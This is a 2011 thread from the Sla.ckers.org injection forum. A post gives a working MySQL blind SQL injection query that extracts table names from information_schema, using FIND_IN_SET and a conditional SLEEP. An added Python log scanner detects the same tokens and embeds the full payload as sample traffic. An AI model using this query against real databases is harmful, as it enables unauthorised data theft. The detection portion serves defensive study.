Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Faster blind injection data extraction
Posted by: lightos
Date: April 01, 2011 08:49AM

I was researching ways to retrieve data from a MySQL database with fewer requests than the traditional methods (Bisection, Bit Shift). I found a way to accomplish this with as few as 2 requests per character using this query:

AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM
information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));

For a detailed explanation:
[websec.ca]

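For defenders, the query in the post above combines several tokens that rarely appear together in legitimate request parameters (a user-variable assignment, FIND_IN_SET, information_schema, and a conditional SLEEP), and the SLEEP(5) branch shows up as a multi-second response. The following is an added example, not part of the original post, that scans access-log lines for that combination; the log format, the shortened sample payload, the function names and the thresholds are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Assumed log format: client "METHOD target PROTO" response_seconds
LINE = re.compile(r'^(\S+) "\w+ (\S+) [^"]*" ([\d.]+)$')
SIGNATURES = {
    "delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "uservar": re.compile(r"@\w+\s*:="),
    "find_in_set": re.compile(r"\bfind_in_set\s*\("),
    "schema": re.compile(r"\binformation_schema\b"),
}

def normalize(raw):
    """Undo up to three layers of URL encoding, drop /**/ comments, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return re.sub(r"/\*.*?\*/", " ", raw).lower()

def matched_signatures(target):
    text = normalize(target)
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

def analyze(lines, min_hits=2, delay_s=4.5):
    """Per client: requests matching >= min_hits signatures, and how many were slow."""
    report = defaultdict(lambda: {"flagged": 0, "delayed": 0})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, secs = m.group(1), m.group(2), float(m.group(3))
        if len(matched_signatures(target)) >= min_hits:
            report[client]["flagged"] += 1
            report[client]["delayed"] += secs >= delay_s
    return dict(report)

# Constructed sample data (not real traffic): the post's query with a shortened character list.
PAYLOAD = ("7 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1),'a,b,c')),{pos},1) "
           "FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5))")
def _line(client, target, secs):
    return f'{client} "GET {target} HTTP/1.1" {secs}'
SAMPLE_LOG = [
    _line("10.0.0.5", "/item.php?id=7", 0.04),
    _line("10.0.0.9", "/item.php?id=" + quote(PAYLOAD.format(pos=1)), 0.05),
    _line("10.0.0.9", "/item.php?id=" + quote(quote(PAYLOAD.format(pos=2))), 5.06),
    _line("10.0.0.5", "/report.php?range=year", 6.20),  # slow but benign
    _line("10.0.0.9", "/item.php?id=" + quote(PAYLOAD.format(pos=3).replace(" ", "/**/")), 0.05),
]
if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Matching on the token combination rather than on latency alone keeps the slow but benign report request out of the results, while the double-encoded and comment-padded variants are still caught after normalization.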
Re: Faster blind injection data extraction
Posted by: Kyo
Date: April 02, 2011 08:40AM

Cool stuff! I've been doing it the lazy way, but this is really clever.
